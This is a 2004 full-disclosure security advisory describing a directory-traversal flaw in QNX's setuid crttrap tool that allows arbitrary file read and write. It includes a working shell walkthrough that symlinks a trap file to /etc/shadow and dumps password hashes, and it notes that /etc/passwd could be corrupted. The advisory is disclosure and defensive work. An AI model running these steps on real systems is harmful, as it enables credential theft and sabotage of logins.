*** rfdslabs security advisory ***

Title: QNX crttrap arbitrary file read/write vulnerability [RLSA_06-2004]
Versions: QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A)
Vendor: http://www.qnx.com
Date: Dec 11 2004
Author: Julio Cesar Fort

1. Introduction

crttrap is a tool that detects video hardware and starts the correct driver for QNX.

2. Details

crttrap has a '-c' flag to specify where the trap file will be written. Combined with the 'trap' flag it is possible to read/write any file on the disk.

By default crttrap writes and reads trap files in "/etc/system/config". Since this directory is owned by root we don't have permission to write there. It filters "../" to prevent directory traversal vulnerabilities. To bypass this protection we noticed that it checks only for "../", not for "/" by itself. This way it is possible to make it create a subdirectory, giving our group read and write privileges. Now we are able to manipulate our trap file.

  $ crttrap -c tmp/rfdslabs trap
  /usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
  /usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
  crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
  $ cd /etc/system/config/tmp
  $ ls -la
  total 52
  drwxrwxr-x  2 root  100    2048 Dec 11 12:40 .
  drwxrwxr-x  3 root  root   2048 Dec 11 12:35 ..
  -rw-r--r--  1 root  100   21671 Dec 11 12:40 rfdslabs
  $ rm -f rfdslabs
  $ ln -s /etc/shadow rfdslabs
  $ crttrap -c tmp/rfdslabs dump
  root:21QjUKxP9gEJK:0:0:0
  sandimas:91UzHxvt3x1n2:0:0:0

We are also able to overwrite any file with the 'trap' switch. As an example, an attacker can corrupt '/etc/passwd' and make login attempts fail every time. See www.rfdslabs.com.br for another file deletion vulnerability in crttrap.

PS: On 31 May 2002, Simon Oullette found a bug in the crttrap '-c' flag in QNX 4.25. But his exploitation technique won't work with the newest versions because crttrap opens files only in "/etc/system/config" and its subdirectories.

3. Solution

No official solution yet.
We suggest removing the crttrap SUID bit until QNX releases a patch.

4. Timeline

10 Dec 2004: Vulnerability detected
11 Dec 2004: Advisory written; rfdslabs contacts QNX
20 Dec 2004: QNX replies to rfdslabs
28 Dec 2004: Advisory released to the public

Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury, Rodrigo Costa (NERV).

www.rfdslabs.com.br - computers, sex, human mind, music and more
Recife, PE, Brazil

--
Julio Cesar Fort (julio at rfdslabs com br)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html